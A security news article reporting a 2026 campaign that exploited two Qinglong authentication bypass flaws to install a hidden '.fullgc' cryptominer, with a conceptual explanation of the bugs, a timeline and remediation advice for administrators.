Qinglong RCE flaws exploited to install cryptominers on exposed servers

Hackers exploited two authentication bypass vulnerabilities in the Qinglong task scheduler to run cryptominers on publicly exposed servers. The attacks targeted self-hosted Qinglong panels and used remote code execution to install a hidden miner named .fullgc.

The flaws affect Qinglong 2.20.1 and earlier. Qinglong is an open-source timed task management platform used to run Python, JavaScript, Shell, and TypeScript scripts through a web panel.

Security researchers linked the activity to CVE-2026-3965 and CVE-2026-4047. Both issues involved the way Qinglong handled protected API routes, which allowed attackers to reach sensitive functions without valid authentication.

Attackers abused exposed Qinglong panels

The campaign appears to have started in early February 2026, when users began reporting sudden CPU spikes on affected servers. Some systems reportedly reached 85% to 100% CPU usage after the miner started running in the background.

The malware used the name .fullgc, which can look like a normal Java garbage collection reference during a quick process check. This naming choice helped attackers hide the miner from administrators who were only doing a basic review.

Snyk researchers said attackers modified Qinglong’s configuration file and used it to download the miner, save it as a hidden file, make it executable, and restart it if someone killed the process.

What the two Qinglong vulnerabilities did

Vulnerability	Issue	Impact
CVE-2026-3965	A URL rewrite rule exposed protected admin endpoints through an unauthenticated path.	An attacker could reset admin credentials and take control of the panel.
CVE-2026-4047	The authentication check treated API paths as case-sensitive, while Express.js routing did not.	An attacker could reach protected command execution endpoints without logging in.

CVE-2026-3965 came from a rewrite rule that mapped open routes to API routes in a way that bypassed the intended access check. This let an attacker reach an admin initialization function through a path that did not require authentication.

CVE-2026-4047 came from a mismatch between Qinglong’s middleware and Express.js routing behavior. The middleware checked one lowercase API path format, while the router still accepted changed letter casing and sent the request to the protected API route.

This type of bug matters because security checks and routing logic must interpret requests the same way. When middleware sees one path and the application router sees another, attackers can sometimes slip past the protection layer.

Timeline of the Qinglong cryptomining campaign

Date	Event
February 7 to 8, 2026	Users began reporting .fullgc miner infections and heavy CPU usage.
February 10, 2026	Community members pushed for a wider public warning.
February 27, 2026	The authentication bypass issues were publicly reported.
March 1, 2026	Qinglong maintainers merged a fix and released version 2.20.2.
April 2026	Security researchers published wider analysis of the exploitation campaign.

The attacks gained attention first inside Chinese developer forums and GitHub issue threads. That delayed wider awareness in the English-speaking security community, even though affected users had already seen clear signs of compromise.

Qinglong’s popularity increased the risk. The project has more than 19,000 GitHub stars and thousands of forks, and many users deploy it through Docker on cloud servers or home networks.

Self-hosted automation dashboards create a large attack surface when users expose them directly to the internet. If attackers can reach the panel, a single authentication bug can become a server-level compromise.

How admins should respond now

• Update Qinglong to version 2.20.2 or later immediately.
• Rebuild or refresh Docker containers instead of relying only on old running images.
• Check the server for hidden .fullgc files and unknown background processes.
• Review Qinglong configuration files for unexpected shell commands.
• Rotate Qinglong admin credentials after patching.
• Place Qinglong behind a VPN, private network, or access-controlled reverse proxy.
• Block public access to the panel unless remote access is truly required.
• Monitor CPU, outbound traffic, and new scheduled tasks for unusual activity.

Updating alone may not remove malware from a system that attackers already compromised. Administrators should check for persistence, unexpected scripts, and suspicious files before returning the panel to normal use.

Server owners should also treat this incident as a reminder to avoid exposing admin dashboards directly to the internet. Even open-source tools with active maintainers can become risky when management panels sit on public ports without another access layer.

Qinglong users who rely on the platform for automation should review logs from early February onward. Any unexplained CPU spikes, new scripts, changed configuration files, or unknown outbound connections should trigger a deeper investigation.

Why this incident matters

The Qinglong campaign shows how quickly attackers can turn a niche self-hosted tool into a cryptomining target. They did not need a broad consumer platform. They needed reachable dashboards, a working bypass, and enough server resources to monetize.

The vulnerabilities also show a common web security problem. Middleware, route rewriting, and framework behavior must line up exactly, especially around authentication. Small differences in path handling can create high-impact access control failures.

For developers, the lesson is clear: authorization checks should happen as close as possible to the protected action. For admins, the safer approach is just as simple: patch fast, reduce exposure, and never leave powerful automation panels open to the internet.

Summary

1. Hackers exploited two Qinglong authentication bypass flaws to deploy the .fullgc cryptominer.
2. The affected versions include Qinglong 2.20.1 and earlier.
3. The attack targeted publicly exposed self-hosted panels.
4. Qinglong version 2.20.2 includes the fix.
5. Admins should patch, inspect systems for compromise, and restrict public access.

FAQ